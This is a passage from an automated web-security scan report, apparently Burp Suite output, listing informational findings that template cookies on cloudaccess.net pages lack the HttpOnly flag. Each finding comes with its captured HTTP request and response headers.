Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:54 GMT; path=/
Last-Modified: Wed, 21 Jul 2010 02:19:35 GMT
Expires: Mon, 24 Jan 2011 14:07:54 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.693. http://www.cloudaccess.net/billing-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/billing-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /billing-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Sat, 22 Jan 2011 05:52:04 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.694. http://www.cloudaccess.net/client-login.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/client-login.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:44 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /client-login.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:45 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:44 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:45 GMT; path=/
Last-Modified: Tue, 30 Nov 2010 21:35:24 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.695. http://www.cloudaccess.net/cloudaccess-partner-program.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/cloudaccess-partner-program.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:36 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cloudaccess-partner-program.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:36 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Last-Modified: Tue, 21 Dec 2010 04:33:21 GMT
Expires: Mon, 24 Jan 2011 14:07:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.696. http://www.cloudaccess.net/constant-contact-integration.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/constant-contact-integration.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /constant-contact-integration.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Wed, 29 Dec 2010 22:57:38 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.697. http://www.cloudaccess.net/contact-us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/contact-us.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us.html HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Last-Modified: Tue, 02 Nov 2010 20:37:37 GMT
Expires: Mon, 24 Jan 2011 14:07:43 GMT
X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.698. http://www.cloudaccess.net/contact-us/474.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/contact-us/474.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:55 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contact-us/474.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:56 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Last-Modified: Sat, 17 Jul 2010 19:57:40 GMT
Expires: Mon, 24 Jan 2011 14:07:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.699. http://www.cloudaccess.net/copyright-policy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/copyright-policy.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<b
...[SNIP]...

14.700. http://www.cloudaccess.net/flipphoto-pro.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cloudaccess.net
Path:	/flipphoto-pro.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
